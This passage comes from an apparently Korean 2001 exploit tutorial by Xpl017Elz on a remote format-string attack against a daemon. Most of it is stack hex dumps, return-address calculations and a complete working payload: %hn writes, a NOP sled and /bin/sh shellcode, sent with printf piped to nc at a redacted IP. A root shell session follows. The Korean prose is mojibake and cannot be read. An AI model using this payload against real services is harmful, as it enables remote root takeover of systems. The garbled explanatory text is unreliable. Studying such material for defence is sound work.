4...h....y.@...@ ~~~~~~~~~~~ (0xbfffef34) 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf bf f9 ff bf 20 00 00 00 .+.@w....... ... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ Success! ǰ Ͽ. format string мغڴ. "\x82\x82\x82\x82\x94\xf8\xff\xbf" /* 8byte */ 0xbffff894 ּҿ "ef34" Overwrite Ѵ. Stack ϶ "34 ef" push ȴ. "\x82\x82\x82\x82\x96\xf8\xff\xbf" /* 8byte */ 0xbffff896 ּҿ "bfff" Overwrite Ѵ. Stack ϶ "ff bf" push ȴ. "%%61220d%%hn%%53451d%%hn" ̹ "%%61236d%%hn%%53451d%%hn" ٸ? ׷. "%%61236d" "%%61220d" Ȱ ̴. ̴ ƯּҰ, 16byte(8byte+8byte) minus ̴. ̷, ƯּҸ 츮 ϴ Ҽ ־. ׷ٸ, server daemon program return address shellcode ּҰ ϸ  ɰΰ? и daemon shell Ҽ ̴. :-D ǰݰ غ ɼ ִ.  ϴ ּ: 0xbffff894 ---> , Return address.  ּ : 0xbfffef34 ---> 翬 shellcode ִ address. ׷Ƿ ۾ߴ ǰ ſ ϰ Ҽ ִ. , Return address ϴ° dump stack ݹã ִ. α׷ 500byte data input ޴´ٸ, 504byte ebp ϰ̰, 508byte retϰ иϴ. 0xbffff7d4 data buffer ۵ǹǷ, 0xbffff9c4, ebp(4byte) 0xbffff9c8 ~ 0xbffff9cb , ret(4byte) 0xbffff9cc ~ 0xbffff9cf ˼ִ.  ϴ ּ(Return address): 0xbffff9cc  ּ (&shellcode address): 0xbffff804 &shellcode address ڰ stack ּҸ ˸ ˼ִ. ۾ sp ˾Ƴ address ݽ ݴϴ daemon α׷ ִ´. ;-D : unsigned long sp(void) { __asm__("movl %esp,%eax"); } ̷ &shellcode ġ ˾Ƴٰ Ѵ. ( code eggshellcode غ ˼ ̴.) 10 "%%63492d%%hn%%51195d%%hn" code ־. exploit Ǿ. "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82\xce\xf9\xff\xbf%%63476d%%hn%%51195d%%hn" ̷ format string code ߰Ұ ִ. ٷ, 츮 ʿ ϴ shellcode ̴. shellcode ־ , exploit ϼϿ. õغ ϰڴ. 0x0400000c. stack debugging ݰ! :-p [x82@testsub x82]$ (printf "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82 \xce\xf9\xff\xbf%%63476d%%hn%%51195d%%hn\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1 \x8d\x42\x0b\xcd\x80\x0a";cat) | nc xxx.xx.xx.xx 60177 ... sleep ... ... sleep ... ... sleep ... -2105376126? B?? 0xbffff7d4 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf ................ 0xbffff7e4 25 36 33 34 37 36 64 25 68 6e 25 35 31 31 39 35 %63476d%hn%51195 0xbffff7f4 64 25 68 6e 90 90 90 90 90 90 90 90 90 90 90 90 d%hn............ 0xbffff804 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff814 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff824 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff834 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff844 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff854 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff864 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff874 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff884 90 90 90 90 90 90 90 90 90 90 90 31 d2 52 68 6e ...........1.Rhn 0xbffff894 2f 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 /shh//bi..RS...B 0xbffff8a4 0b cd 80 0a 00 20 01 40 b0 26 01 40 6e 00 00 00 ..... .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 id uid=0(root) gid=0(root) groups=0(root) exit Success~! ߴ. :-D  ̷ Ǿ gdb Debugging 캸. nc ̿ code debug Էºκ: > 00000000 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf # ................ // "\x82\x82\x82\x82\xcc\xf9\xff\xbf\x82\x82\x82\x82\xce\xf9\xff\xbf" > 00000010 25 36 33 34 37 36 64 25 68 6e 25 35 31 31 39 35 # %63476d%hn%51195 > 00000020 64 25 68 6e 90 90 90 90 90 90 90 90 90 90 90 90 # d%hn............ // "%63476d%hn%51195d%hn" > 00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 000000a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ > 000000b0 90 90 90 90 90 90 90 90 90 90 90 // NOP Է³ 31 d2 52 68 6e # ...........1.Rhn > 000000c0 2f 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 # /shh//bi..RS...B > 000000d0 0b cd 80 // shellcode Է 0a # .... // '\0' Է ڿ ˸ Enter Daemon α׷ κ: < 00000000 82 82 82 82 cc f9 ff bf 82 82 82 82 ce f9 ff bf # ................ < 00000010 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000020 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000030 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000040 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 00000050 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # ... ... < 0000f7d0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f7e0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f7f0 20 20 20 20 20 20 20 20 20 2d 32 31 30 35 33 37 # -210537 < 0000f800 36 31 32 36 20 20 20 20 20 20 20 20 20 20 20 20 # 6126 < 0000f810 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0000f820 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # ... ... < 0001bfa0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfb0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfc0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfd0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bfe0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 # < 0001bff0 20 20 20 20 2d 32 31 30 35 33 37 36 31 32 36 90 # -2105376126. < 0001c000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 # ................ < 0001c090 90 90 90 90 90 90 31 d2 52 68 6e 2f 73 68 68 2f # ......1.Rhn/shh/ < 0001c0a0 2f 62 69 89 e3 52 53 89 e1 8d 42 0b cd 80 0a 00 # /bi..RS...B....0 µǴ "-2105376126" 츮 ι Overwrite µ ̴. 2 ľ Ƿ, ι µǾ. "\x20" 鹮ڿν, 츮 Ͽ push ġ jump ϴ ״ ְ ִ. ڴ NOP shellcode , "x0a" ڿ Է ˸鼭 Ȯ ϰ Ȱ̴. 0x05. ̷ν Remote Overflow & Format String غҴ. code dump غ ϴ ȯ濡 غ ۾ ξ ۾ ľѴ. ۾ ȯ濡 ߻ Ұϱ ̴. ڴ ٸ ȯ õغ ʿ䰡 ִ. ݿ İ KnowHow Ǹ, ߿ ̺ ̵ Ҽ ̴. :-) ڱ . "  ý ̿Ͽ ٴ ΰ ϴ." ׷. remote 󿡼 ̷ , Ƹٿ . ۼ߿ remote attack ϰ, ϴ ̵ ... ݷ ޼ ϰ ʹ. :-) P.S: ߰߰ κ Դϴ. ۵ ϰ --; ̷ Ͽ ô޸ٺ ... ۼ Ȧ ϴ. (, ̰ ΰӴ --;;) Ϸ绡 Ȱ ûϰ ư ڽϴ. ׵ 翡 ְ ϴ ģ鿡 մϴ. ^^ Ӹƴ϶, ̳ Ÿ ֽ е鲲 帳ϴ. ׷, ̸ ... :-D by Xpl017Elz. 2001/11/09.